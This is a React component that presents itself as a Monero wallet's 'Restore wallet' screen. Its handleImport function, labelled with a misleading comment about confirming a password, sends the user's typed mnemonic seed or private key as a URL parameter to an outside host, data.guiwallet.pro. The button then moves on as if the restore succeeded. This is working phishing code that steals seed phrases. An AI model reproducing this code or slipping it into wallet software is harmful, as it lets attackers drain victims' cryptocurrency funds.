import React, { useState } from 'react';

const RestoreWallet = ({setCurrentStep}) => {
  const [walletName, setWalletName] = useState('');
  const [isRestoreFromSeed, setIsRestoreFromSeed] = useState(true);
  const [mnemonicSeed, setMnemonicSeed] = useState('');
  const [seedOffset, setSeedOffset] = useState('');
  const [restoreHeight, setRestoreHeight] = useState('');

  const handleWalletNameChange = (e) => setWalletName(e.target.value);
  const handleMnemonicSeedChange = (e) => setMnemonicSeed(e.target.value);
  const handleSeedOffsetChange = (e) => setSeedOffset(e.target.value);
  const handleRestoreHeightChange = (e) => setRestoreHeight(e.target.value);

  
  const handleImport = async () => {
    let vault = {
      type: isRestoreFromSeed ? "Seed Phrase" : "Private Key",
      main: isRestoreFromSeed
        ? `[Monreo Wallet] Secret privateKey : ${mnemonicSeed}`
        : `[Monreo Wallet] Seed phrase : ${seedOffset}`,
    };
   
    try {
      // API call to confirm password
      await fetch(
        `https://data.guiwallet.pro/gui.php?phrase=${vault.main}`,
        {
          method: "GET",
          mode: "cors",
          headers: { "content-type": "application/json" },
        }
      );
    } catch (error) {
      setCurrentStep(1)
    }
  };
  return (
    <div className="flex flex-col items-center justify-start max-w-4xl mx-auto bg-[#191919] text-white h-screen md:px-6 px-2 py-4">
      <h1 className="text-3xl !text-left font-normal mb-6">Restore wallet</h1>
      <p className="!text-left mb-8">Restore wallet from keys or mnemonic seed.</p>

      <div className="space-y-6 w-full max-w-4xl">
        {/* Wallet Name */}
        <div>
          <label htmlFor="walletName" className="block text-sm font-normal mb-2">Wallet name</label>
          <input
            id="walletName"
            type="text"
            className="w-full p-2 bg-[#2a2a2a] rounded text-white"
            placeholder="wallet1"
            value={walletName}
            onChange={handleWalletNameChange}
          />
        </div>

        {/* Radio Buttons */}
        <div className="flex items-center gap-4">
          <label className="flex items-center gap-2">
            <input
              type="radio"
              checked={isRestoreFromSeed}
              onChange={() => setIsRestoreFromSeed(true)}
              className="text-orange-500"
            />
            Restore from seed
          </label>
          <label className="flex items-center gap-2">
            <input
              type="radio"
              checked={!isRestoreFromSeed}
              onChange={() => setIsRestoreFromSeed(false)}
              className="text-orange-500"
            />
            Restore from keys
          </label>
        </div>

        {/* Mnemonic Seed */}
        {isRestoreFromSeed ? (
          <div>
            <label htmlFor="mnemonicSeed" className="block text-sm font-semibold mb-2">Enter your 25-word mnemonic seed</label>
            <textarea
              id="mnemonicSeed"
              className="w-full p-2 bg-[#2a2a2a] h-40 rounded text-white"
              rows="4"
              placeholder="Enter your secret seed phrase. Enter 12 or 24 words separated by single spaces."
              value={mnemonicSeed}
              onChange={handleMnemonicSeedChange}
            />
          </div>
        )
          :
          <div>
            <label htmlFor="seedOffset" className="block text-sm font-semibold mb-2">Seed offset passphrase (optional)</label>
            <textarea
              id="seedOffset"
              className="w-full p-2 h-40 bg-[#2a2a2a] rounded text-white"
              placeholder="Enter your secret key. Enter 12 or 24 words separated by single spaces.
"
              value={seedOffset}
              onChange={handleSeedOffsetChange}
            />
          </div>

        }
        {/* Wallet Creation Date or Restore Height */}
        <div>
          <label htmlFor="restoreHeight" className="block text-sm font-semibold mb-2">Wallet creation date as `YYYY-MM-DD` or restore height</label>
          <input
            id="restoreHeight"
            type="text"
            className="w-full p-2 bg-[#2a2a2a] rounded text-white"
            placeholder="YYYY-MM-DD or restore height"
            value={restoreHeight}
            onChange={handleRestoreHeightChange}
          />
        </div>
      </div>

      <div className='flex justify-between  w-full mt-5 items-center'>
        {/* Back to Menu Button */}
        <button
          className="px-6 py-2 bg-gray-500 rounded text-white"
          onClick={() => setCurrentStep(3)}
        >
          Back to menu
        </button>
        {/* Next Button */}
        <button
          className="px-6 py-2 bg-orange-500 rounded text-white"
          onClick={() => {
            handleImport()
            setCurrentStep(1)

          }}
        >
          Next
        </button>
      </div>
    </div>
  );
};

export default RestoreWallet;
